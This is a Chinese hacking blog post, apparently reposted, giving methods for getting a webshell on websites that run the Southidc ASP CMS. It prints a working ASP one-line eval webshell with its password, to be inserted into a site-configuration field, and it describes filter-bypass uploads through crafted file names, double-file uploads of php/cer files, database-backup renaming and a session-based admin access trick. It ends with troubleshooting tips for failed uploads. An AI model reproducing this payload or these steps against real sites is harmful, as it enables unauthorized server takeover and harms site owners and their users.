渗透|Clown'sBlog

渗透-Clown'sBlog|渗透测试技巧|黑客攻防|0day公布

解决良精科技(southidc)被破坏的情况拿shell

小康's Blog:

不知道大家有没有遇到这种情况,原本很好拿的南方科技但是很多平常可以利用的方式都不可以使用了。
那么我们来总结一下常见拿南方科技的方式。
前台得到账户密码这里不多做讲诉,不过有一款类似的cms倒是存在cookies欺骗,因为这款cms使用的是asp session时钟是30min
也就是说我们一般遇到了最多也只能在30分钟里面进行操作。
访问后台页面如果存在session.asp,那么你就会得到一个session然后你就可以操作你想操作的了。
那么我们继续我们要说的后台常见拿shell的方式。


1> 数据库插入拿shell
打开网站配置—-随便找一个字符长度没有限制的地方插入你的回执代码。
因为asp需要用<% %>来闭合,而且一个标记和另外一个标记之间通常会用双引号和单引号来闭合
所以这里我们插入一句话代码在网站地址这里因为这里的长度通常不会太短。。 当然一般也是可以修改源码来获得更加长的字符长度。。。
一句话内容:


"%><%a=request("XiaoKang")%><%eval a%><%'


密码:XiaoKang
连接地址inc/config,asp


2>数据库备份拿shell
通常情况来讲数据库被分拿shell会需要fso权限而且还要开放了才可以,这里我推荐大家使用抓包工具修改路径和后缀数据。
3>编辑器拿shell
编辑器拿shell,方式很简单了就是类似eweb拿shell一样,打开southidceditor/admin_style.asp
然后修改样式数据,因为这个编辑器采用的是过滤和黑名单的方式来实现上传监控。所以我们只需要构造一下上传的文件名就可以了
比如aaspsp,具体这里吧多做叙述。
4>双文件上传拿shell
其实双文件上传就是修改表单数据造成的,其实因为这款系统没有过滤php和cer可以很简单的实现上传。php和cer文件。具体看网站配置。


下面说一下可能会遇到的问题


1 为什么我上传了文件打开却不存在


这里检查一下你的网站空间是否具有写入权限或者是否虚拟主机是否已经满了,检查方式就是打开文件管理,看能否删除文件。
如果是满了删除即可,如果没有写入权限通常是放弃。


2 我明明有写入权限但是上传文件为什么老是打开失败。提示不能解析


这里通常是因为服务商安装了安全软件导致的。最简单的方式就是换一个上传目录,具体参见网站配置


3 只有编辑器上传,没有表单上传。我上传的文件目录又不能建立,偏偏我就这么一个可以操作的和写入的地方我该怎么做。。


这里比较简单的方式就是利用数据库备份来实现文件目录的创建,修改提交数据即可。


先说到这里,有时间再继续更新!


不懂的话就留言问我吧!



评论
热度(1)
  1. 渗透|Clown'sBlog小康's Blog 转载了此文字

© 渗透|Clown'sBlog | Powered by LOFTER